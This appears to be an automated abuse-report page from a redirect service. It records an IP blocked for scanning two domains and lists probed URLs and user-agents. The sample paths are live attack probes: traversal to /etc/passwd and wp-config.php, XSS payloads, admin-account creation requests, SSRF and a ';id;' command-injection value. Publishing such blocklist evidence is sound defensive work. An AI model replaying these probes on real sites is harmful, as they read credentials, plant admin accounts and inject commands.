abuseip.org
- Reason
- suspicious paths across 2 domains
- Hits (last hour)
- 170
- Unique targets hit
- 2
- Unique paths probed
- 1,667
- Detection count
- 142
- First seen
- 2026-05-02 00:22:00 UTC
- Last seen
- 2026-05-02 01:21:54 UTC
- Block expires
- 2026-05-03 01:22:01 UTC
Sample paths probed
- /wp-content/plugins/simple-ajax-chat/sac-export.csv
- //one/siteinfo.php
- /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=UokhZy&adminpassword=lNOF9z&[email protected]&adminname=test
- /../../../../../../../../../../../etc/passwd
- /asd/../../../../../../../../etc/passwd
- /academy/tutor/filter?searched_word=acoa5">>>><script<script<script<script>alert(document.domain)>alert(document.domain)>alert(document.domain)>alert(document.domain)</script</script</script</script>dyzs0>dyzs0>dyzs0>dyzs0&searched_tution_class_type%5B%5D=acoa5"&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5"&searched_duration%5B%5D=acoa5"
- /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
- /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
- /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
- /scim/v2/Users
- /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
- /index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
- /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
- /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=2GJgyd&adminpassword=NqvGDD&[email protected]&adminname=test
- /ftb.imagegallery.aspx
- /?aiowpsec_do_log_out=1&al_additional_data=1
- /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
- /cgi-bin/masterCGI?ping=nomip&user=;id;
- /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
- /api/scim/v2/Users
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
- Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0
- Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
- Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_9 rv:6.0; ms-MY) AppleWebKit/532.11.2 (KHTML, like Gecko) Version/5.0 Safari/532.11.2
- Mozilla/5.0 (Macintosh, Intel Mac OS X 10.15, rv:140.0) Gecko/20100101 Firefox/140.0
- Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.15
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
- Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Mobile/15E148 Safari/604.1
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
- Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
- Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
- Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.